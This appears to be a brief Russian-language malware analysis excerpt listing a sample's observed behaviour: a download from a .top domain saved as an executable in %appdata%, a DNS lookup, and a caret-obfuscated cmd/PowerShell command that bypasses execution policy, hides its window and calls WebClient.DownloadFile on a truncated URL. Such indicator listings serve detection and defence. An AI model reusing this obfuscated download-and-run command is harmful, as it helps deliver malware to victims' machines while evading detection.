Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^E^Rs^h^ELL.^e^X^e -^eX^ECU^TIonpO^li^Cy ^B^Ypas^S -^NoP^rOF^ILE^ ^-WI^n^Dows^TylE^ HI^D^DE^N ^(^N^e^W-o^bJEct^ s^y^ST^E^M^.^NET.WEBcl^iEn^T^)^.dOWn^loaDFi^L^E^(^'http://w...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^Ow^E^Rs^h^ELL.^e^X^e -^eX^ECU^TIonpO^li^Cy ^B^Ypas^S -^NoP^rOF^ILE^ ^-WI^n^Dows^TylE^ HI^D^DE^N ^(^N^e^W-o^bJEct^ s^y^ST^E^M^.^NET.WEBcl^iEn^T^)^.dOWn^loaDFi^L^E^(^'http://w...' (со скрытым окном)